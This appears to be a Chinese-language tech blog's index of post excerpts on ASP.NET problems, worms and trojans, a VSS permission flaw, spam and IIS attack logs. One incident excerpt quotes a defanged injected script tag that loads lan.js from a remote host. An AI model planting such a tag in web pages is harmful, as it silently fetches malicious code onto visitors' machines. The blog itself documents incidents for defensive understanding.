今天才發現這點。我在ASP.NET 2.0的GridView中想要放一個HyperLinkField觸發Javascript Function，但一在DataNavigateUrlFormatString中加上"j avascript:"字眼，產出的HTML裡，該Link會完全消失，只剩下DataT...

今天遇見一隻MSN病毒，感染後會抓取連絡人清單，傳送類似Photo.zip的壓縮檔。這種手法不怎麼新鮮，但傳的是ZIP檔，表示得引誘使用者打開ZIP檔並開啟其中的"毒物"才算達陣。這年頭大家對網路上傳送的VBS、EXE之流都已存有戒心，不敢隨便開，過去我有看過用PIF誘騙User開檔的，所以對ZIP...

發現了VSS裡有個要命的選項，勾選後可以不管VSS帳號密碼，直接以Windows當下的登入帳號對應到VSS使用者。也就是說，只要使用者用Administrator登入Wndows後，就可以直接升等成VSS裡的Administrator! 有沒有這麼扯呀? 一開始，我不相信VSS的安全控制可以兩...

前陣子解剖了一隻3合1木馬，結果該木馬又持續鬧了好幾天，也讓孤陋寡聞的我對病毒木馬的日新月益，再次大開眼界，讚嘆不已... 大部分人的刻板印象是，如果我的機器沒有沒有中毒、沒有中木馬、沒有惡意程式，網路上也沒有人狂送封包轟炸，我使用網路應該不致受到影響吧??  代誌並不像憨人所想的哈尼甘...

一直很羡慕FireFox上有各式各樣的外掛可以加，其中Greasemonkey是一直讓我流口水的功能之一。(想知道Greasemonkey的神通廣大可以參考這裡 、這裡) 覺得某個網站的介面太鳥、功能太少，馬上可以自己動手改造成自己想要的樣子，這是多麼爽快的事。Greasemonkey提...

同事回報發生了疑似中毒事件，查看的結果，發現中毒的機器用IE讀取網頁時(包含http://www.google.com.tw)在HTML Source的最前端會被插入一列:<script src="httq://www_blogo_tw/lan.js"></script> (...

同事有個網站，是一個http的網頁中，用<FrameSet>包了兩個https的<Frame> Frame1 & Frame2，三個網頁都在同一個網站上。問題來了，網頁在絕大部分的人的機器上都正常，就獨獨一位老兄的IE6，在操作過程中會出現Permission Den...

ASP.NET的淺顯易學，讓許多初學者靠著翻書自修就打造起自己的網站王國。可是，有些書上沒教的事，卻可能讓你的網站變成駭客的後院，在ASP.NET防駭指南裡，我們就來看看這些常被忽視的網頁安全漏洞。 文章下載 ** 本文發表於RUN!PC雜誌155期 **

我一直很欣賞GMail的垃圾信防護功能，每次看到垃圾信匣中滿滿的垃圾郵件，而收件匣中總是能保持乾淨清爽，都不免讚嘆一番，甚至還一度懷疑是GMail主動塞入垃圾信搞績效的(就像警察要養案做業績一樣)，哈! 這幾個月來，開始發現遇爾會有幾封漏網之魚跑到收件匣中，還發現一些好玩的事。 我們都已經很習慣在網...

沒有做Windows更新的電腦直接曝露在Internet中，可以撐多久? 答案是: 不到四個小時... 以前有幾次經驗，檢查對外IIS的Log時，發現幾乎每天凌晨都有一大串嘗試IIS漏洞的Request，依其頻率及連貫性，判斷應是程式自動發的，而且還分別來自不同的IP，表示不只一個人在網路上...

歷經8月底與不知名病毒的慘烈博鬥後，公司簽約的防毒公司總算在數天之後出了可以識別該病毒的病毒碼更新，得知其代號為Win32.Bacalid(巴卡雷?)，但是防毒程式似乎只能偵測並阻止有毒檔案被執行，並沒有能力刪除或移除病毒，而且當時我查了各大防毒網站，幾乎沒啥關於該病毒的資訊，但總之毒害不會再擴大，...

起初，我只是要幫忙看看網路問題而已，真的!公司有個部門幾天前換了IP，就開始陸續有人回報某幾程式不能跑或一些奇奇怪怪的狀況。原本推測應該是改IP、網域信任之類的問題，卻一直無法找出直接關聯的證據。最後網管將問題縮小具體化為，有一支放在File Server上的程式，某一樓層的可用、另一樓層的人只要一...

這幾天為了一個幾家防毒軟體大廠都還無法偵測的病毒(或是SpyWare?)搞得人仰馬翻。因為現成的防毒軟體到目前都還沒有解決方案，這裡就先提出我的觀察心得讓大家知道。不過，我並非病毒專家，以下只是個人見解，大家參考就好，不負任何保證責任。【症狀】    &nbs...

同事Pass給我一個台灣某銀行WebATM的安裝設明網頁，裡面有段嚇人的設定說明:我想連許多網頁開發者都不是很清楚這個設定的影響吧! 所謂標示為不安全，並不是元件設計有瑕疵或是摻有惡意程式碼，而是指基於功能需要，元件提供了一些可被Script呼叫的函數，而可能讓Script做出某些影響系統安全的動作...

無意間為了查某個特別的Windows系統檔案，被Google導引來到這個網站http://www.neechi.co.uk/: 其中的每個目錄都可以點開，整個結構跟Windows的C碟一模一樣，甚至還可以在裡面找到一堆MP3、私人生活照片、個人文件。起初我以為是某個人的電腦中了木馬，被大喇喇地公佈...